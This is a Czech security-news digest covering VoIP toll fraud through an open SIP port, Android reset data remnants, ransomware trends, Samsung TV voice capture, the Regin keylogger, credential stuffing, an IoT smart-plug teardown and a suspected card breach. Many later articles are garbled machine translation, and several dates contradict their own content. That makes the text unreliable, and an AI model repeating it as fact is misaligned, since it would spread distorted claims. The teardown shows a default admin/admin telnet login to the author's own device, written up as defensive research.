13.6.2015 Hrozby Problém s přemrštěnými náklady na telefonování vznikl poté, kdy konzultant změnil konfiguraci a otevřel řídicí porty do internetu bez vyžadované autentizace.
Jako manažer bezpečnosti očekávám, že na naši společnost bude útočit záplava malwaru, bude docházet k pokusům o krádeže dat, útokům DoS a k pokusům o neoprávněný přístup. Všechny případy řeším při jejich výskytu, díky čemuž je moje práce pořád zajímavá.
Některé události však upoutají nejen pozornost moji, ale také našeho vedení. Bývají to incidenty vedoucí k přímé ztrátě buď peněz, nebo velmi citlivých dat. Samozřejmě že to jsou případy, kterým chci zabránit v největší míře nehledě na to, zda jsou pracovně zajímavé nebo ne.
Když dojde několikrát do roka k podobnému typu bezpečnostní události s finanční ztrátou, změní se zajímavost velmi rychle ve frustraci.
Minulý týden mi finanční analytička zpracovávající platby pro IT oddělení řekla, že dostala upozornění od našeho poskytovatele telekomunikačních služeb, že nám za méně než jeden den naskočily poplatky v řádu desítek tisíc korun za telefonní hovory do Kostariky, Bolívie a Kolumbie.
Protože v žádné z těchto zemí nepodnikáme a ani nemíváme mezinárodní hovory v takovéto výši během necelých 12 hodin, vypadalo to jako nějaký druh napadení.
Ale jak? Jen před několika měsíci byl náš telefonní systém napadený a můj tým společně s interním oddělením telekomunikací strávil několik týdnů implementací bezpečné konfigurace našich bran pro IP telefonii. V bezpečnost našich bran jsem tedy dodnes měl naprostou důvěru. Co se tedy stalo?
Když jsem mluvil s naším manažerem telekomunikačních služeb o poslední faktuře za mezinárodní hovory, začal mít podezření, co se mohlo stát. Trochu jsme zapátrali a zjistilo se, že jeho podezření bylo správné.
Náš smluvní dodavatel totiž pracoval na nové infrastruktuře pro videokonference včetně serveru umístěného v naší demilitarizované zóně pro zpracování videohovorů mezi námi a vzdálenými místy. Dohled přitom ale měli naši lidé.
S oním dodavatelem se několikrát sešla naše komise pro kontrolu ICT architektury, abychom zajistili, že se použijí dostatečně bezpečné zásady a konfigurace. I během implementace došlo několikrát k ověření, že náš partner dodržuje vše potřebné.
Přezkum současné konfigurace videokonferenčního serveru (VCS) však ukázal, že jejich konzultant změnil konfiguraci, otevřel port 5060 a povolil protokol SIP a další řídicí porty do internetu, aniž byla nutná nějaká autentizace.
Poplatky nezaplatíme ze svého
Konzultant tedy okamžitě musel tuto zranitelnost odstranit, aby se předešlo dalším neautorizovaným hovorům. Potom jsme začali sledovat síťová připojení k VCS a pozorovali jsme tabulku připojení. A co myslíte, že jsme zjistili? Objevili jsme stovky pokusů o připojení ze serverů v Kostarice, Bolívii a Kolumbii.
Je zřejmé, že v čase, kdy byly naše telefonní brány vůči internetu otevřené, někdo proskenoval náš prostor IP adres (zjistili jsme, že se to děje stále) a objevil otevřený port. Tato osoba potom jednoduše nasměrovala svou vlastní IP bránu do naší infrastruktury a směrovala své hovory přes nás.
Tyto aktivity mohou být ziskové. Lze je zvládnout pomocí bezplatného open source softwaru pro pobočkové ústředny, jako jsou například Asterisk a SIP Witch. Jakmile našli otevřený port bez autentizace, mohli tito zlí chlapíci informace o tom prodat někomu dalšímu, který také mohl využívat bezplatné spojení, nebo dokonce i přeprodávat levnější hovorné.
Dokázali jsme tedy zacelit díru, která nás stála spoustu peněz, ale management nebude spokojený, dokud se nám nepovede tyto ztráty kompenzovat.
Reakce našeho poskytovatele telekomunikačních služeb ale nebyla povzbudivá. Naše ztráty podle nich nelze u nich uplatnit. Na druhou stranu konzultant zmíněného dodavatele uznal svou chybu a slíbil, že nám jejich firma škody uhradí.
Data z telefonů s OS Android nemusejí být vymazána ani po obnovení továrního nastavení
25.5.2015 Hrozby Z nové studie vyplývá, že ani po resetování telefonu s operačním systémem Android do továrního nastavení nemusejí být vždy smazána všechna citlivá dat.
Vědci z University of Cambridge vydali novou studii, v níž testovali jedenadvacet použitých telefonů zakoupených mezi lednem a květnem minulého roku na aukčním portálu eBay. Konkrétně šlo o telefony od společností Samsung, HTC, LG, Motorola a tři smartphony řady Nexus od Googlu. Na telefonech běžely různé verze Androidu - od verze 2.3.x až po 4.3.
Z výsledků studie vyplývá, že vědci byli v osmdesáti procentech případů schopni číst tzv. master tokeny Googlu, které je možné použít k opětovnému spárování zařízení s Google účtem předchozího vlastníka.
Díky tomu by potenciální útočníci mohli získat přístup k e-mailům, kontaktům, heslům na Wi-Fi a dalším informacím, které jsou na Google účtu uloženy. V některých případech se vědcům podařilo dokonce získat přístup k tokenům různých IM aplikací či Facebooku. „Důvodů, proč resetovací mechanismus selhal, je více a nutno podotknout, že nové telefony jsou v tomto směru lepší, než ty staré. Lze také říci, že z telefonů Googlu je obecně možné po resetování získat méně dat, než z telefonů OEM,“ uvedl v příspěvku na blogu jeden z tvůrců studie Ross Anderson. „Výrobci by měli lépe odvádět svou práci a uživatelé by si měli dávat větší pozor.“
Riziko toho, že nový majitel telefonu získá přístup k datům toho starého, je možné do jisté míry eliminovat šifrováním. Jak však zjistili vědci, pomyslný útočník by byl v některých případech schopen získat dostatečné množství informací k prolomení šifrovacího klíče i po obnovení továrního nastavení telefonu. Je proto důležité, aby si uživatelé při šifrování svých telefonů nastavili silná hesla, jelikož prolomení PINu o čtyřech číslech je příliš snadné.
V závislosti na svých zjištěních vědci odhadují, že je na světě až 500 milionů zařízení, z jejichž disků nebyla správně mazána data a 630 milionů zařízení, u nichž nebyla úplně vyčištěna SD karta, tudíž na ní lze najít třeba fotografie a videa.
Vědci zkoumali také řešení známých bezpečnostních společností, která umožňují například uzamknout a vymazat zařízení na dálku. Došli však k závěru, že ani tyto aplikace nenabízejí dostatečnou alternativu, jelikož jejich funkce jsou limitovány architekturou operačního systému a dostupnými API. Se 100 % funkčním řešením tak mohou podle vědců přijít pouze výrobci telefonů.
Hackeři se snaží černou práci přenést na samotné oběti
22.5.2015 Hrozby Změnu taktiky počítačových podvodníků odhaluje Nejnovější vydání Zprávy o internetových bezpečnostních hrozbách (Internet Security Threat Report, ISTR) společnosti Symantec. Ti se totiž snaží nenápadně infiltrovat sítě největších organizací a vyhnout se přitom detekci. A mají i jiné triky.
Obrazně řečeno, útočníci se nepotřebují pokoušet vyrážet dveře, když mohou bez jakéhokoliv rozruchu získat klíče. Podvodníci se pomocí různých triků snaží přimět podniky, aby si infekci do sítě pustily samy.
Trojské koně se např. vydávají za aktualizace běžných programů. Stačí počkat, až si je oběti stáhnou, a útočníci mohou získat až neomezený přístup do firemní sítě.
Poslední rok byl podle Symanteku rekordní z hlediska tzv. zero day zranitelností (jde o chyby, proti nimž výrobce softwaru dosud nenabízí opravu). Průzkum ukazuje, že softwarovým firmám trvá vytvoření a distribuce záplaty v průměru 59 dní; o rok dříve to přitom byly pouhé 4 dny. Útočníci dokáží tohoto zpoždění využít – pro srovnání, v případě medializované chyby Heartbleed se první pokusy o zneužití zranitelnosti objevily už za pouhé 4 hodiny.
Podvodníci loni také pokračovali ve vysoce cílených útocích (spear-phishing), jejichž množství loni vzrostlo o 8 %. Zvláštní pozornost si zaslouží přesnost těchto útoků; k úspěšnému navedení oběti na škodlivé weby (které provádějí tzv. drive-by download útoky či jiné způsoby zneužití) a stažení malwaru stačilo v roce 2014 útočníkům posílat o 20 % méně phishingových e-mailů.
Přibývá pokusů o vydírání
E-mail zůstává významným vektorem útoků, nicméně počítačoví podvodníci experimentují i s novými metodami. Zneužívání mobilních zařízení či sociálních sítí jim umožňuje s menším úsilím zasáhnout více lidí.
Útočníci jsou v podstatě líní, takže preferují automatizované nástroje a snaží se, aby oběti za ně samy udělaly příslušnou práci. V loňském roce bylo 70 % podvodných odkazů v sociálních médiích sdíleno ručně. Útočníkům jistě dělá radost, nakolik jsou lidé ochotni důvěřovat obsahu sdílenému jejich přáteli.
Podobné podvody mohou zločincům přinést rychlý, ale jen omezený zisk. Někteří proto preferují lukrativnější a agresivnější útoky, jako je např. ransomware. Množství malwaru, který své oběti vydírá, vzrostlo loni o 113 %. Oproti roku 2013 se 45krát zvýšil počet obětí, jimž malware zašifroval jejich data.
V minulosti byl přitom rozšířenější „tradiční“ ransomware, který zpravidla předstíral, že jeho odesilatelem je policie nebo podobná instituce. Oběť byla při tomto podvodu např. obviněna ze stažení obsahu chráněného autorskými právy a měla zaplatit pokutu.
Nyní útočníci častěji nic nepředstírají a otevřeně požadují výpalné, když před tím oběti šifrováním znepřístupní soubory, fotografie a jiný obsah.
Odposlechy chytrých televizí? Samsung reaguje na obvinění
12.2.2014 Hrozby Samsung poté, co se objevily zprávy o tom, že jeho chytré televizory odposlouchávají konverzace svých uživatelů, vydal oficiální prohlášení, v němž fungování své služby přirovnává k aplikaci Siri od Apple.
Na počátku tohoto týdne se objevily zprávy o tom, že chytré televizory Samsungu mohou uživatele v jejich obývacích pokojích "odposlouchávat" a odesílat sesbíraný obsah třetím stranám.
„Mějte prosím na vědomí, že mezi informacemi, které se zaznamenávají a odesílají třetí straně, mohou být i vaše osobní nebo citlivé informace,“ píše Samsung v podmínkách uživání svých chytrých televizorů.
„Třetí stranou“ má Samsung podle všeho na mysli firmu Nuance, která vyvíjí jeho software určený pro rozpoznávání hlasu. Jelikož není jméno Nuance v podmínkách užívání služby Samsungu nijak výslovně zmíněno, vzbuzuje všal tato obecná formulace řadu otázek.
I když někteří experti již mluvili o paralele s Velkým bratrem zmíněným v knize 1984 od George Orwella, Samsung se brání, že takto to určitě není. Samsung v oficiálním prohlášení uvedl, že otázky týkající se ochrany soukromí, bere „velmi vážně“ a o ochranu uživatelských dat se proto stará hned několik systémů.
V prohlášení dále stojí, že chytré televizory Samsungu opatřené funkcí rozeznávání hlasu (pomocí níž lze například přepínat kanály) musejí odesílat hlasová data třetí straně tak, aby tato byla převedena na text a následně byla odeslána opět televizoru. Chytrý televizor Samsungu tak v tomto ohledu funguje stejně, jako třeba hlasová asistentka Siri u zařízení od Apple.
Samsung navíc podotkl, že jeho funkce rozeznávání hlasu je volitelná a lze ji kdykoli vypnout v nastavení. Pokud uživatelé budou mít o své soukromí opravdu velký strach, mohou své televizory navíc odpojit od bezdrátové sítě.
„Pokud uživatelé funkci hlasového odposlechu zapnou, mezi odesílaná data budou patřit pouze pokyny určené televizoru nebo hledání, která provádějí v zabudovaném vyhledávači,“ dodal Samsung.
S informací o tom, že chytré televizory Samsungu mohou odposlouchávat své uživatele, přišel britský portál BBC. Jak však BBC podotýká, podobné problémy měly v minulosti i jiné společnosti.
Například v roce 2013 bezpečnostní experti informovali o tom, že informace o návycích uživatelů mohou shromažďovat televizory LG. LG následně vydalo nový firmware, který uživatelům umožnil vybrat si, zda chtějí uživatelé svá data s firmou sdílet nebo ne.
NSA zřejmě kvůli získávání dat spolupracuje s tvůrci malwaru
28.1.2014 Hrozby Značná část kódu keyloggeru, který byl použit americkou národní bezpečnostní agenturou NSA, je shodná s klíčovou komponentou sofistifikované platformy Regin, která se roky používala ke špehování firem, vládních institucí i jednotlivců. Keylogger (aplikace, která zaznamenává stisknuté klávesy na počítači uživatele a následně je zasílá útočníkovi) s označením QWERTY byl pravděpodobně součástí rozsáhlého systému používaného NSA a jejími partnerskými organizacemi a byl mezi informacemi, který Edward Snowden poskytl novinářům.
Keylogger zpřístupnil 17. ledna německý deník Der Spiegel spolu se souborem tajných dokumentů, které popisovaly možnosti NSA a jejích partnerských agentur z Velké Británie, Kanady, Austrálie a Nového Zélandu (tzv. Five Eyes Partners). „Získali jsme kopii škodlivého kódu publikovaného listem Der Spiegel a když jsme jej analyzovali, okamžitě nám připomněl Regin,“ uvedli včera na blogu výzkumníci ze společnosti Kaspersky Lab. „Když jsme se na kód podívali blíže, došli jsme k závěru, že keylogger QWERTY je identický s pluginem 50251 pro Regin.“
Výzkumníci Kaspersky následně zjistili, že QWERTY i 50251 jsou propojené se stejným modulem na platformě Regin kódově označované 50225. Tato komponenta umožňuje červu běžet v tzv. kernelu operačního systému, aniž by to uživatel tušil. Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Jak uvedl Kaspersky, jde o silný důkaz svědčící o tom, že QWERTY byl součástí platformy Regin. „Vezmeme-li v úvahu extrémní sofistifikovanost platformy Regin a velmi malou šanci, že by jej někdo mohl duplikovat, aniž by měl přístup k jeho zdrojovému kódu, došli jsme k závěru, že tvůrci QWERTY a Regin buďto spolupracují, nebo jde o týž osoby.“ Podle listu Der Spiegel je QWERTY plug-inem pro unifikovanou síť zvanou jako WARRIORPRIDE, kterou využívají partneři Five Eye. V dokumentu, který unikl z Communications Security Establishment Canada (kanadská obdoba NSA) je WARRIORPRIDE popisován jako flexibilní platforma určená pro průnik do počítačových systémů.
V dokumentu dále stojí, že WARRIORPRIDE je také uvnitř britské špionážní agentury GCHQ přezdíván jako DAREDEVIL a partneři v rámci Five Eyes k němu mohou libovolně vytvářet plug-in a přizpůsobovat si jej.
Z dostupných informací tak vyplývá, že platforma, kterou bezpečnostní společnosti označují jako Regin, je vlastně to, co NSA a spol. mají pojmenované jako WARRIORPRIDE. To už někteří jiní experti dříve předpokládali.
Podle Kaspersky Lab byl Regin červem, který infikoval v roce 2013 počítač belgického kryptografa Jeana Quisquatera, přičemž tento útok byl spojován s jiným útokem na belgickou telekomunikační skupinu Belgacom, mezi jejíž zákazníky patří Evropská komise, Evropský parlament a Evropská rada.
Gartner varuje před sofistifikovanějšími kybernetickými útoky
23.1.2014 Hrozby Podle Gartneru hackeři využívají čím dál lepší postupy, které jim umožňují oblestít i pokročilé bezpečnostní systémy.
Klienti Gartneru během uplynulých dvou měsíců upozornili na „značný nárůst“ snah o přihlášení se k jejich webovým službám za pomoci kradených přihlašovacích údajů, napsala na blog Gartneru analytička Avivah Litanová. Hackeři se snaží dostat do bankovních systémů, ke službám spravujícím virtuální měny (především bitcoiny) a „čemukoli dalšímu, co se dá zpeněžit“. Tento zájem hackerů není neobvyklý – útočníci však používají nové metody, díky kterým je obtížnější je odhalit.
Útoky, při kterých hackeři zkoušejí tisíce kradených přihlašovacích údajů z pouhých několika IP adres, jsou obvykle rychle zablokovány. Avšak nyní útočníci podle Gartneru zvolili jinou taktiku a útoky „rozmělnili“ na více počítačů. „U běžného útoku je jedna IP adresa nyní v průměru použita pouze v průměru 2,25x, než se útočníci přesunou k další IP adrese,“ uvedla Litanová.
Přihlašovací údaje jsou navíc útočníky testovány pouze jednou či dvakrát za hodinu v závislosti na službě, tudíž útoky trvají týdny či měsíce. Administrátoři pak mají větší problém tuto podvodnou aktivitu zachytit.
Jindy útočníci používají sítě spojené s populárními cloudovými službami, jejichž IP adresy nejsou považovány za nebezpečné a nebudou blokovány. Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Hackeři, kteří mají o své oběti alespoň nějaké informace, se navíc snaží podvodně připojit k dané službě z přibližně stejného místa (či spíše země nebo regionu), v němž daná osoba žije a bezpečnostní systémy tak opět obelstit.
Přihlašovací údaje používané při útocích hackeři získávají na undergroundových burzách, kde je prodávají jiní útočníci, kteří se nabourali do systémů velkých firem. Litanová jako příklad uvedla ruský gang zvaný CyberVor, který shromáždil 1,2 miliardy přihlašovacích údajů a 500 milionů e-mailových adres z celé řady služeb.
Na CyberVor přišli odborníci ze společnosti Gold Security, která mimo jiné detekovala také masivní krádeže dat u společností Adobe či Target.
Jak uvádí Litanová, na trhu jsou samozřejmě bezpečnostní služby, které firmám umožní se i proti novým technikám útočníků bránit. Patří mezi ně cloudové systémy, které shromažďují metadata z IP adres a zařízení používaných legitimními uživateli pro transakce a umožňují třeba také speciálně upravit kód webové stránky firmy tak, aby bylo pro útočníky složitější najít v něm případnou díru.
Ve vzorku poslal k nám, tam jsou tři konkrétní zdroj IP adresa: 109.199.82.5, 62.210.207.146 a 31.47.254.62. Všechny tři IP adresy mají dobrou pověst (zkontrolovat na TrustedSource , SenderBase a SANS Internet Storm Center). Vypadá to, že klient se snaží dosáhnout skript s názvem tes1a0 a nastavení WordPress testu cookie, takže Wordpress může říct, klient přijímá soubory cookie a žádná chyba mikroorganismy povolené. Ověřil jsem si pro řetězec tes1a0 v Wordpress 4.1 instalace ke stažení, a to není součástí kódu. Je také jasné, to je satelitní bot falešný. Zkontrolujte předchozí deník Dr. Johannes Ullrich o tom, jak kontrolovat , když není google Google je .
Viděli jste tento druh WordPress pokusů? Pokud ano, dejte nám vědět přes Kontaktní formulář . Budu aktualizovat deník s shromážděných informací.
Internet věcí: Vzpoura strojů 13.1.2015 Hrozby
Naše domy a kanceláře jsou stále více napadány elektronických zařízení s vloženým skutečný počítač s operačním systémem a skladování. Jsou připojeny k síťovým zdrojům pro vzdálenou správu, statistiky a dat dotazování. To se nazývá "internetu věcí" nebo "internetu věcí". Moje domácí síť je tvrzený a každý nový (neznámé), zařízení připojené k němu získá IP adresu z určitého rozsahu, který nemá připojení s ostatními hostiteli nebo na internetu, ale jsou přihlášeni jeho pakety. Cílem je odhalit podezřelé aktivity, jako úniku dat nebo neočekávané aktualizace firmwaru. Poslední hračku koupil jsem včera, je inteligentní Plug z Supra-Electronics. Toto zařízení umožňuje ovládat napájecího kabelu ze zásuvky prostřednictvím svého mobilního zařízení a vypočítat spotřebu energie s pěknou statistiky. Měl jsem velmi dobrou příležitost koupit za velmi nízkou cenu (25 €). Podívejme se, co je uvnitř .... Dokumentace zmiňuje postup nastavení a řízení prostřednictvím mobilního zařízení (s bezplatná aplikace pro iOS a Android), ale první reflex je skenování krabici. Zajímavé, webový server, stejně jako server, telnet čekají na paketů. Zkusme běžné přihlašovací údaje, jako admin / admin a ...
$ Telnet 192.168.254.225 snaží 192.168.254.225 ... , má přímé spojení s 192.168.254.225 uniknout znak je '^]. " (none) login: admin Heslo: BusyBox v1.12.1 (2014-07-31 06:32:52 SELČ ) zabudované ve skořápce (jasan) Enter "pomoc" pro seznam vestavěných příkazů. #
Ihned po spouštěcí sekvence, přístroj začal snažit komunikovat s vzdáleným počítačům: Mezi DNS dotazů a synchronizace NTP, velký provoz byl vytvořen na různých IP adresy přes protokol UDP / 10001. Stejný paket je odeslán do různých hostitelů. Užitečné zatížení byl blok 60 bajtů: Nebyl jsem schopen dekódovat obsah tohoto užitečného zatížení, prosím, vyjádřit, když člověk zjistí nějaké vzory. Zařízení také provádí pravidelnou kontrolu konektivity pomocí jediného ICMP ECHO paketu na www.google.com (každých 5 minut). Tento síťový provoz je generován procesu zvaném RDTServer:
# Ps PID USER VSZ STAT COMMAND 1 admin 1400 S init 2 admin 0 SWN [ksoftirqd / 0] 3 admin 0 SW <[události / 0] 4 admin 0 SW <[khelper] 5 admin 0 SW <[kthread] 6 admin 0 SW <[kblockd / 0] 7 admin 0 SW <[kswapd0] 8 admin 0 SW [pdflush] 9 admin 0 SW [pdflush] 10 admin 0 SW <[AIO / 0] 11 admin 0 SW [mtdblockd] 18 admin 1084 S nvram_daemon 19 admin 1612 S goahead 20 admin 872 R RDTServer 24 admin 1400 R telnetd 26 admin 872 S RDTServer 27 admin 872 S RDTServer 33 admin 872 S RDTServer 34 admin 872 S RDTServer 35 admin 872 S RDTServer 36 admin 872 S RDTServer 53 admin 1400 S / bin / sh 238 admin 0 SW [RtmpCmdQTask] 239 admin 0 SW [RtmpWscTask] 366 admin 1400 S SH 505 admin 1400 R ps 678 admin 1400 S udhcpd /etc/udhcpd.conf 1116 admin 1396 S udhcpc -i apcli0 -s /sbin/udhcpc.sh -p / var / run / udhcp 1192 admin 872 S RDTServer 1207 admin 772 S NtpClient -s -c 0 -h ntp.belnet.be -i 86400 # Popadl jsem kopie RDTServer binární (Mips) a pomocí "řetězců" příkaz proti souboru odhalil zajímavé věci. Použité IP adresy byly nalezeny v binární:
IP FQDN síťový_název Country 50.19.254.134 m1.iotcplatform.com AMAZON-EC2-8 US 122.248.234.207 m2.iotcplatform.com Amazon EC2-SG Singapore 46.137.188.54 m3.iotcplatform.com AMAZON-EU-AWS Irsko 122.226.84.253 Jinhua -MEIDIYA-LTD Čína 61.188.37.216 ChinaNET-SC Čína 220.181.111.147 ChinaNET-IDC-BJ Čína 120.24.59.150 m4.iotcplatform.com ALISOFT Čína 114.215.137.159 m5.iotcplatform.com ALISOFT Čína 175.41.238.100 AMAZON-AP-RESOURCES- JP Japan
Vidět pakety odeslané do Číny, je často podezřelé! Název domény iotcplatform.com patří ThroughTek, společnost specializující se na internetu věcí a M2M ("Machine to Machine") připojení platformy:
IOTCPLATFORM.COM: Domain Name ID registru domény: 1665166563_DOMAIN_COM-VRSN kanceláře WHOIS Server: whois.godaddy.com kanceláře URL: http://www.godaddy.com aktualizace: 2014-07-09T11: 44: 15Z Datum vytvoření: 2011 -07-04T08: 50: 36Z Registrátor Registrace Datum ukončení platnosti: 2016-07-04T08: 50: 36Z kanceláře: GoDaddy.com, LLC kanceláře IANA ID: 146 Registrátor zneužití Kontaktní e-mail: abuse@godaddy.com kanceláře Zneužívání Kontaktní telefon: + 1.480-624-2505 registru o registraci ID: Žadatel Jméno: Charles Kao o registraci organizace: Žadatel Ulice:. 4F, No.221, Chongyang Rd,. Žadatel Město: Taipei Žadatel Stát / Provincie: Nangang District Žadatel PSČ: 11573 Země o registraci: Tchaj-wan o registraci Telefon: 886,886226535111 Žadatel Phone Ext: Žadatel Fax: Žadatel Fax Ext: Žadatel Email: justin_yeh@tutk.com Ve skutečnosti, platforma IOCT je služba, vyvinutý ThoughTek navázat P2P komunikaci mezi zařízeními. Četl jsem v dokumentaci dodané se zařízením, stejně jako všichni na webovou stránku, a není tam žádná zmínka o této služby. Výrobci by měli zahrnovat některé technické dokumentace o požadavcích na sítě (ex: stahovat aktualizace firmwaru). V tomto případě to není hlavní problém se zabezpečením, ale tento příběh se prosazuje to, co už víme (a bát se) o internetu věcí: tato zařízení mají slabou konfiguraci a nedostatek viditelnosti / dokumentace o jejich chování. Buďte opatrní při připojování je na vaší síti. Nejvhodnější je kontrolovat provoz, které generují jednou on-line (DNS dotazy, HTTP (S) žádost nebo jakýkoli jiný protokol), - ". Je-li nepřítel ponechává dveře otevřené, musíte spěchat do" - Sun Tzu PGP klíč: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x42D006FD51AD7F2C
Některé protokoly a / nebo pakety, prosím? 9.1.2014 Hrozby
Ahoj, pokud máte nějaké protokoly z těchto podsítí k infrastruktuře a budete moci sdílet, mohl bys?
61.174.51.0/24 (i když si vezmu / 16) 218.2.0.0/24 122.225.0.0/16 112.101.64.0/24 103.41.124.0/24 61.240.144.0/24 Pokud nemůžete sdílet protokoly nebo pakety, možná byste mi mohl poslat zdrojovou IP a cílový port. (Použijte kontaktní formulář nebo pošlete jim přímo na markh.isc (at) gmail.com)
Výše uvedené jsou aktivní na SSH a DNS, jen se snaží zjistit, jestli tam je něco jiného, a pokud ano, jaké a v jaké části světa.
Pozdravy
Značka
Poznámka: Díky za všechny informace dosud velmi ceněn, aby to přijde. Pokud odesláním souboru, prosím e-mailem přímo do markh.isc (at) gmail.com jako kontaktní formulář soubor zařízení má problém. To se podíval na, ale v mezidobí použijte prosím e-mailovou adresu.
Ohrožena pověření v podnikových cloudových aplikací 9.1.2014 Hrozby Nová zpráva Netskope vykazuje trvalý růst cloud použití app přes podniků, stejně jako velké množství, ve kterém jsou soubory sdílena mimo dané organizace.
Nejvíce pozoruhodně, tolik jako 15 procent podnikových uživatelů měli své pověření ohrožena. Vzhledem k tomu, až do poloviny uživatelů pro opětovné použití hesla pro více účtů, pravděpodobnost uživatelů přihlášení do kritických podnikových aplikací s těmito pověření je vysoká, uvedení obchodně citlivé údaje v ohrožení. Podniky i nadále přijímat cloudových aplikací rychlým tempem, s průměrem 613 cloudových aplikací na organizaci ve 4. čtvrtletí, a to až z 579 v předchozím čtvrtletí. Závěry zprávy jsou založeny na desítky miliard oblačných app událostí, které vidíte přes miliony uživatelů mezi říjnem a prosincem 2014. Zpráva zjistila, více než 20 procent organizací v Netskope cloudu aktivně využívat více než 1000 cloudových aplikací, a osm procent souborů v podnikové-schválil cloudového úložiště aplikace jsou v rozporu s DLP politik, včetně PHI, PCI, PII, zdrojový kód, a dalších politik týkajících se důvěrných nebo citlivých dat. Vzhledem k výraznému nárůstu úniků dat a úniky z celé řady významných společností, webové stránky, a cloud aplikace, rostoucí počet uživatelů se přihlásit do které byly odcizené jako součást datového hack nebo vystavení obchodní aplikace pomocí narušenou pověření. Až 15 procent uživatelů měli své pověření ohrožena v expozici předchozím dat, a mnohé z těchto uživatelů opakovaně používat hesla i pro přihlášení do aplikace, které obsahují informace o podnikání a malá písmena.
Skryté nebezpečí kódu třetích stran, ve svobodných aplikací 6.1.2014 Hrozby Výzkum z MWR Infosecurity ukázala různé způsoby, jak mohou hackeři zneužívají reklamní sítě tím, že využívá zranitelnosti v zdarma mobilní aplikace. Když lidé instalovat a používat bezplatné aplikace - víc než placených aplikací - mohou být předává své adresáře, obsah jejich SMS , e-mailem nebo v některých případech, rozdávat plnou kontrolu nad jejich zařízení. Je to proto, že z privilegovaného kódu vstřikované do aplikací, které inzerenti a třetí strany používají pro sledování. Takže zatímco uživatelé mohou důvěřovat vývojáře aplikace, aplikace kód vložený inzerenty může zavést napadání útočníci mohou využívat přístup ke svému zařízení pomocí aplikace. Reklamní sítě dědí všechna oprávnění a možnosti aplikace, která obsahuje kód sítě. V případě, že aplikace může vidět svoje fotky, může reklamní síť. Necháte-li aplikaci pro čtení a odesílání e-mailů, může, a tak na reklamní síť. To znamená, že pokud hackeři jsou úspěšné v pronikání bezpečnostních obranu reklamní sítě je, budou mít přístup ke stejným údajům stejně. Senior bezpečnostní výzkumník Robert Miller z MWR vysvětlil: "Většina mobilních zařízení obsahuje bezpečnostní model, který znamená, že běžící nemůže snadno zobrazit data z app B, a také nelze použít stejná oprávnění. Takže pokud aplikace je vidět vaši SMS a aplikace B nemůže app B nemůže žádat app pro vaši SMS. "Nicméně, pokud app a app B obsahují kód ze stejné reklamní síti, reklamní sítě může zobrazit vaše SMS, pokud si to přeje. Reklamní sítě ve skutečnosti obsahují tuto funkci, a to je jen "cross aplikace" dat. Pokud se útočníci vložit se do obrazu s využitím těchto zranitelností v kódování, je vysoce pravděpodobné, že k tomu, aby ukrást uživatelská data. " Pachatelé mohou ohrozit Apple a zařízení Android s využitím kódu vloženého do mobilní reklamy. Přitom inzerenti by mohl hrát nákupní seznam nečekaných akcí, k nimž patří:
Shromažďovat osobní a citlivé údaje (a vystavit jej odposloucháváním Sledujte svou polohu pomocí GPS Přístup fotografie a další soubory uložené v přístupných místech (například SD kartě na zařízeních se systémem Android) Číst, psát a mazat soubory Pošlete / čtení e-mailových a / nebo SMS zpráv Telefonování Zapnutí a používání kamery / mikrofonu Dynamicky aktualizovat a instalovat kód / aplikace Spustit libovolný příkazy. Tam jsou klíčové rozdíly v mobilním sběru dat bylo dosaženo prostřednictvím reklamy ve srovnání s více tradičními reklamy webové stránky a varoval uživatele, musí být bdělá při udělování oprávnění mobilní aplikaci. "Mnohem přesnější lokalizační údaje mohou být zachyceny z mobilního zařízení prostřednictvím své GPS a některé aplikace vyžadují schopnost legitimně přístup ke kontaktům vlastník zařízení nebo informace adresáře, stejně jako fotografie," řekl Miller. "Spotřebitelé musejí pochopit hlediska ochrany životního prostředí systém mobilních aplikací. Zdarma aplikace jsou podporovány reklamní sítě, které obchodují v datech. Zatímco uživatelé nemusí platit pro tento šikovný použití v peněžním vyjádření, budou platit jejich informací. A to znamená, že uživatelská data je jen tak bezpečný jako reklamní síť. " "To, co jsme ukázali se, že vzhledem k zranitelné a privilegované reklamní kód, aplikace samotná byla podkopána," pokračoval. "inzerenti muset převzít větší odpovědnost za bezpečnost a uživatelů mezitím by měly být zdvojnásobení jejich ostražitost proti tomu příliš znuděný o nájmu aplikace přistupovat ke svým citlivým mobilní data. " Miller navrhl uživatelé by si měli přečíst oprávnění, že požaduje app před instalací. "Je smutné, že tam je zřídka možnost vybrat a vyberte oprávnění vám vyhovuje, takže pokud nesouhlasíte s některou z těchto oprávnění požadované, neinstalujte aplikace.
Platební karty vystaveny ve Možná Chik-fil-A data Porušení 2.1.2014 Hrozby Je to už rok porušení dat , tak to má smysl pouze, že zprávy, vycházejícímu z porušení údajů na populární řetězce rychlého občerstvení, Chik-fil-A, by se objevil v posledních dnech v roce 2014.
Včera pozdě bezpečnost novinář Brian Krebs hlášeno , že anonymní zdroj v nejmenované finanční instituce mu řekl, že některé 9000 z platebních karet svých zákazníků přistál na seznamu výstrahy podvod. Jediným společným point-of-sale nákupy mezi těmito kartami se v Chik-fil-A. Zdroj pokračoval říci Krebs, že banka v otázce měli méně než 9000 platební karty ovlivněni loňské masivní Target porušení, což naznačuje, že údajný Chik-fil-A kompromis by mohl být velký.
Krebs hlásil, že slyší mumlání o možném porušení v Chik-fil-A v listopadu, ale že důkazy mizivé. Nicméně, kolem Vánoc, hlavní sdružení kreditní kartu vydal výstrahu týkající se porušení u nejmenovaného prodejce, která nastala mezi 02.12.2013 a 30.září, 2014. Nyní Krebs tvrdí, že některé instituce pozorovat podvodné činnosti, které lze vysledovat zpět na kuřecí-prodával rychlého občerstvení povolení.
V prohlášení vydaném na KrebsonSecurity.com, s Chik-fil-A mluvčího ani nepotvrdil, ani nevyvrátil porušení smlouvy, ale řekl, že obdržela zprávy od bank varováním porušení a záležitost vyšetřuje. V prohlášení dále uvedl, že v případě, že byl skutečně porušení platebních údajů, že držitelé karty by neměl být odpovědný za placení za podvodné poplatky a že společnosti by nabízet osobám postiženým služby ochrany zdarma identity.
Informace o platbě kartou potenciálně vystaveni možnému Chik-fil-A zneužití dat
Tweet Pokud vyjde najevo, že Chik-fil-A utrpěl porušení, to dá rozum, že řetězec s rychlým občerstvením je point-of-sale infrastruktura byla pravděpodobně napaden nějakým typem RAM-škrabkou nebo Backoff-jako malware . Takový byl případ pro Target, Home Depot a mnoho z desítky dalších porušili prodejců letos.
